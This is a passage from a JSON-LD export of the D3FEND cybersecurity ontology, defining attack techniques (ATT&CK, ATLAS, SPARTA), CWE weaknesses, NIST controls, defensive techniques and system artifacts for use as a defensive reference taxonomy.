        "@id": "d3f:VirtualizationSoftware"
      },
      "d3f:may-create": {
        "@id": "d3f:Directory"
      },
      "rdfs:label": "Run Virtual Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:Ncfd13782cc764364bf21fadb5f817c57"
        },
        {
          "@id": "_:N8a1fe5ce89a7459c9e5c2254e9113223"
        },
        {
          "@id": "_:N65d1f8cc73a1440985936cb2b59fa68a"
        },
        {
          "@id": "_:N12cbc8853c31442bbc54bb348ac8496f"
        }
      ]
    },
    {
      "@id": "_:Ncfd13782cc764364bf21fadb5f817c57",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N8a1fe5ce89a7459c9e5c2254e9113223",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualizationSoftware"
      }
    },
    {
      "@id": "_:N65d1f8cc73a1440985936cb2b59fa68a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualizationSoftware"
      }
    },
    {
      "@id": "_:N12cbc8853c31442bbc54bb348ac8496f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "d3f:AML.T0024.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.000",
      "d3f:definition": "Adversaries may infer the membership of a data sample or global characteristics of the data in its training set, which raises privacy concerns.\nSome strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](/techniques/AML.T0005.001), others use statistics of model prediction scores.\n\nThis can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.",
      "rdfs:label": "Infer Training Data Membership - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Infer Training Data Membership"
    },
    {
      "@id": "d3f:T1221",
      "@type": "owl:Class",
      "d3f:attack-id": "T1221",
      "d3f:definition": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)",
      "rdfs:label": "Template Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-14",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Signed Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:MessageAuthentication"
        }
      ],
      "rdfs:label": "CM-14"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Automated Audit Actions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "rdfs:label": "AC-2(4)"
    },
    {
      "@id": "d3f:CWE-771",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-771",
      "d3f:definition": "The product does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed.",
      "rdfs:label": "Missing Reference to Active Allocated Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:Compiler",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a compiler is a computer program that translates computer code written in one programming language (the source language) into another language (the target language). The name \"compiler\" is primarily used for programs that translate source code from a high-level programming language to a lower level language (e.g., assembly language, object code, or machine code) to create an executable program.",
      "d3f:reads": {
        "@id": "d3f:CompilerConfigurationFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Compiler"
      },
      "rdfs:label": "Compiler",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:BuildTool"
        },
        {
          "@id": "_:Nf5cafc974d8d4058898893e307847035"
        }
      ]
    },
    {
      "@id": "_:Nf5cafc974d8d4058898893e307847035",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CompilerConfigurationFile"
      }
    },
    {
      "@id": "d3f:Provider",
      "@type": "owl:Class",
      "d3f:definition": "Providers are entities that intentionally offer, supply, or facilitate goods, services, or resources through actions of their agents.",
      "rdfs:label": "Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "d3f:T1089",
      "@type": "owl:Class",
      "d3f:attack-id": "T1089",
      "d3f:definition": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.001",
      "rdfs:label": "Disabling Security Tools",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1172",
      "@type": "owl:Class",
      "d3f:attack-id": "T1172",
      "d3f:definition": "Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1090.004",
      "rdfs:label": "Domain Fronting",
      "rdfs:seeAlso": {
        "@id": "d3f:T1090.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:REC-0006.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006.02",
      "d3f:definition": "Adversaries study how you test to learn what you don’t test. They inventory static analyzers and coding standards (MISRA/C, CERT, CWE rulesets), dynamic tools (address/UB sanitizers, valgrind-class tools), fuzzers targeted at command parsers and protocols (e.g., CCSDS TC/TM, payload formats), property-based tests, mutation testing, coverage thresholds, and formal methods applied to mode logic or crypto. They also examine HIL setups, fault-injection frameworks, timing/jitter tests, and regression suites that gate release. Gaps, such as minimal negative testing on rare modes, weak corpus diversity, or untested rate/size limits, inform exploit design and the timing of inputs to evade FDIR or saturate queues.",
      "rdfs:label": "Security Testing Tools - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0006"
      },
      "skos:prefLabel": "Security Testing Tools"
    },
    {
      "@id": "d3f:UnitTestExecutionTool",
      "@type": "owl:Class",
      "d3f:definition": "An unit test execution tool automatically performs unit testing.  Unit testing is a software testing method by which individual units of source code are tested to determine whether they are fit for use.  Unit test execution tools work with sets of one or more computer program modules together with associated control data, usage procedures, and operating procedures. This contrasts with integration testing, which tests inter-unit dependencies and the modules as a group.",
      "rdfs:label": "Unit Test Execution Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Unit_testing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:TestExecutionTool"
      }
    },
    {
      "@id": "d3f:definition",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x definition y: The d3fend object x has the definition y.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/IAO_0000115"
      },
      "rdfs:label": "definition",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:UserAccountLockEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is locked out due to failed authentication attempts or administrative action.",
      "rdfs:label": "User Account Lock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nbe000996febe47728cd2b09ed208434a"
        }
      ]
    },
    {
      "@id": "_:Nbe000996febe47728cd2b09ed208434a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:EX-0016.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0016.03",
      "d3f:definition": "The attacker raises the noise floor in GNSS bands so satellite navigation signals are not acquired or tracked. Loss of PNT manifests as degraded or unavailable position/velocity/time solutions, which in turn disrupts functions that depend on them, time distribution, attitude aiding, scheduling, anti-replay windows, and visibility prediction. Because GNSS signals at the receiver are extremely weak, modest jammers within the antenna field of view can produce outsized effects; mobile emitters can create intermittent outages aligned with the attacker’s objectives.",
      "rdfs:label": "Position, Navigation, and Timing (PNT) Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0016"
      },
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Jamming"
    },
    {
      "@id": "d3f:CWE-72",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-72",
      "d3f:definition": "The product does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system.",
      "rdfs:label": "Improper Handling of Apple HFS+ Alternate Data Stream Path",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:T1547.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.003",
      "d3f:definition": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Time Providers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N089b002ed11442af8a5ebbc9e12c3d93"
        }
      ]
    },
    {
      "@id": "_:N089b002ed11442af8a5ebbc9e12c3d93",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1021.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.006",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "Windows Remote Management",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:T0857",
      "@type": "owl:Class",
      "d3f:attack-id": "T0857",
      "d3f:definition": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network.",
      "rdfs:label": "System Firmware - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "System Firmware"
    },
    {
      "@id": "d3f:RDPTLSHandshakeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the cryptographic exchange of keys and certificates between an RDP client and server to establish a secure communication channel. The handshake ensures encryption, integrity, and authentication for the session.",
      "rdfs:label": "RDP TLS Handshake Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:OTNetworkManagementCommand",
      "@type": "owl:Class",
      "d3f:definition": "Manage message routing or network connection mechanisms.",
      "rdfs:label": "OT Network Management Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:T1218.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.007",
      "d3f:definition": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.",
      "rdfs:label": "Msiexec",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:AML.T0069.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.002",
      "d3f:definition": "Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.",
      "rdfs:label": "System Prompt - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "System Prompt"
    },
    {
      "@id": "d3f:OTNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Network traffic generated by operational technology devices, e.g., programmable logic controllers.",
      "d3f:may-contain": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "OT Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "_:N1a3d8700a409438cb8a481710a3d7fff"
        }
      ]
    },
    {
      "@id": "_:N1a3d8700a409438cb8a481710a3d7fff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:DS0039",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data sources with information about the set of devices found within the network, along with their current software and configurations",
      "d3f:exactly": {
        "@id": "d3f:AssetInventoryAgent"
      },
      "rdfs:label": "Asset (ATT&CK DS)"
    },
    {
      "@id": "d3f:ChangeDefaultPassword",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ChangeDefaultPassword"
      ],
      "d3f:d3fend-id": "D3-CDP",
      "d3f:definition": "Changing the default password means replacing the factory-set credentials with a strong, unique password before the device is deployed, preventing unauthorized access.",
      "d3f:hardens": {
        "@id": "d3f:OTController"
      },
      "d3f:kb-article": "## How it works\nChange the default password as soon as a new device is received. The default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means.\n\n## Considerations\n* These should be changed before a device is brought online so that an adversary cannot take advantage of these default credentials.\n* Strong and complex passwords are preferred if the technology allows.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CPGChecklist"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        },
        {
          "@id": "d3f:Reference-MITREATTACKPasswordPolicies"
        }
      ],
      "d3f:strengthens": [
        {
          "@id": "d3f:Password"
        },
        {
          "@id": "d3f:UserAccount"
        }
      ],
      "rdfs:label": "Change Default Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StrongPasswordPolicy"
        },
        {
          "@id": "_:Nf6028025973f4f5d9adc33dc17ae68e9"
        },
        {
          "@id": "_:N38b6569972614123837e634b302ee9a9"
        },
        {
          "@id": "_:Nacf5710527e948139d55cf859640ccd8"
        }
      ]
    },
    {
      "@id": "_:Nf6028025973f4f5d9adc33dc17ae68e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTController"
      }
    },
    {
      "@id": "_:N38b6569972614123837e634b302ee9a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:Nacf5710527e948139d55cf859640ccd8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:DNSServer",
      "@type": "owl:Class",
      "d3f:definition": "A Domain Name System (DNS) name server is a kind of name server.  Domain names are one of the two principal namespaces of the Internet. The most important function of DNS servers is the translation (resolution) of human-memorable domain names and hostnames into the corresponding numeric Internet Protocol (IP) addresses, the second principal name space of the Internet which is used to identify and locate computer systems and resources on the Internet. (en).\n\nMore generally, a name server is a computer application that implements a network service for providing responses to queries against a directory service. It translates an often humanly meaningful, text-based identifier to a system-internal, often numeric identification or addressing component. This service is performed by the server in response to a service protocol request.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Name_server"
      },
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:windows-registry-value",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x value y: The key-value pair x has the data value y.",
      "rdfs:label": "windows-registry-value",
      "rdfs:subPropertyOf": {
        "@id": "d3f:windows-registry-data-property"
      },
      "skos:altLabel": "value"
    },
    {
      "@id": "d3f:risk-likelihood",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Risk likelihood rating, expressed on a numeric scale from 1 (lowest likelihood) to 5 (highest likelihood) in the context of a 5x5 risk matrix.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.cto.mil/wp-content/uploads/2024/05/RIO-2023-2-2.pdf"
      },
      "rdfs:label": "risk-likelihood",
      "rdfs:range": {
        "@id": "_:Nfd73d08cc2df44aba5f93e4d8a1b8449"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "_:Nfd73d08cc2df44aba5f93e4d8a1b8449",
      "@type": "rdfs:Datatype",
      "owl:onDatatype": {
        "@id": "xsd:integer"
      },
      "owl:withRestrictions": {
        "@list": [
          {
            "@id": "_:N047bdbca214047f889b5ccf300c6d916"
          },
          {
            "@id": "_:N1ab936c2155c44a08414b782a1d78359"
          }
        ]
      }
    },
    {
      "@id": "_:N047bdbca214047f889b5ccf300c6d916",
      "xsd:minInclusive": 1
    },
    {
      "@id": "_:N1ab936c2155c44a08414b782a1d78359",
      "xsd:maxInclusive": 5
    },
    {
      "@id": "d3f:OTReadDeviceConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read device configuration.",
      "rdfs:label": "OT Read Device Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:N04225a47b8d9427eae0a510caad1a619"
        }
      ]
    },
    {
      "@id": "_:N04225a47b8d9427eae0a510caad1a619",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-213",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-213",
      "d3f:definition": "The product's intended functionality exposes information to certain actors in accordance with the developer's security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product's administrator, users, or others whose information is being processed.",
      "rdfs:label": "Exposure of Sensitive Information Due to Incompatible Policies",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:CWE-131",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-131",
      "d3f:definition": "The product does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.",
      "rdfs:label": "Incorrect Calculation of Buffer Size",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T0802",
      "@type": "owl:Class",
      "d3f:attack-id": "T0802",
      "d3f:definition": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.",
      "rdfs:label": "Automated Collection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Automated Collection"
    },
    {
      "@id": "d3f:DHCPNakEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends a NAK message to reject a client's REQUEST, indicating that the requested configuration cannot be granted.",
      "rdfs:label": "DHCP Nak Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N920ae70b7f134f4ebd8bf35a5fe3d583"
        }
      ],
      "skos:altLabel": "DHCPNAK"
    },
    {
      "@id": "_:N920ae70b7f134f4ebd8bf35a5fe3d583",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPRequestEvent"
      }
    },
    {
      "@id": "d3f:StoredProcedure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A stored procedure (also termed proc, storp, sproc, StoPro, StoredProc, StoreProc, sp, or SP) is a subroutine available to applications that access a relational database management system (RDBMS). Such procedures are stored in the database data dictionary.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Stored_procedure"
      },
      "rdfs:label": "Stored Procedure",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1140",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1140",
      "d3f:definition": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-add": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Deobfuscate/Decode Files or Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Nac90e315600f4957af88eea803c6b291"
        },
        {
          "@id": "_:N4a056484945e4082afd93b89e5fdccc4"
        },
        {
          "@id": "_:Naf2f6d30bda74332a597e83a27088e24"
        }
      ]
    },
    {
      "@id": "_:Nac90e315600f4957af88eea803c6b291",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N4a056484945e4082afd93b89e5fdccc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:Naf2f6d30bda74332a597e83a27088e24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:CWE-1266",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1266",
      "d3f:definition": "The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect.",
      "rdfs:label": "Improper Scrubbing of Sensitive Data from Decommissioned Device",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-008%3AMSBuildAndMsxsl_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-008/"
      },
      "d3f:kb-abstract": "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variaty of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-008: MSBuild and msxsl",
      "rdfs:label": "Reference - CAR-2020-11-008: MSBuild and msxsl - MITRE"
    },
    {
      "@id": "d3f:CCI-000067_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors remote access methods.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000067"
    },
    {
      "@id": "d3f:M1041",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:EncryptedTunnels"
        },
        {
          "@id": "d3f:FileEncryption"
        },
        {
          "@id": "d3f:MessageEncryption"
        }
      ],
      "rdfs:label": "Encrypt Sensitive Information"
    },
    {
      "@id": "d3f:Non-PersonEntity",
      "@type": "owl:Class",
      "d3f:definition": "An entity related to information technology with a digital identity that acts in cyberspace, but is not a human actor. This can include organizations, hardware objects (physical entities/devices), software objects (virtual/logical entities), and information artifacts.",
      "d3f:synonym": "NPE",
      "rdfs:label": "Non-Person Entity",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:NIST_SP_800-53_R5"
        },
        {
          "@id": "d3f:Reference-CNNSI-4009"
        },
        {
          "@id": "https://csrc.nist.gov/glossary/term/non_person_entity"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:CWE-548",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-548",
      "d3f:definition": "The product inappropriately exposes a directory listing with an index of all the resources located inside of the directory.",
      "rdfs:label": "Exposure of Information Through Directory Listing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-497"
      }
    },
    {
      "@id": "d3f:T1654",
      "@type": "owl:Class",
      "d3f:attack-id": "T1654",
      "d3f:definition": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).",
      "rdfs:label": "Log Enumeration",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:ScheduledJobStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the execution of a scheduled task, triggered either automatically by the scheduler or manually by a user.",
      "rdfs:label": "Scheduled Job Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N0a9d34f7cf66477a909824f323d9a3fe"
        }
      ]
    },
    {
      "@id": "_:N0a9d34f7cf66477a909824f323d9a3fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:dependent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x dependent y: A dependent y is an entity that requires the fulfillment of the requirements specified in dependency x.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00729216-a"
      },
      "rdfs:label": "dependent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:PacketCaptureFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkPacket"
      },
      "d3f:definition": "A file which contains raw representations of collected packets.",
      "rdfs:label": "Packet Capture File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Nf2ec8b17caa84c14b07c958bef2d9ec5"
        }
      ]
    },
    {
      "@id": "_:Nf2ec8b17caa84c14b07c958bef2d9ec5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkPacket"
      }
    },
    {
      "@id": "d3f:CWE-1177",
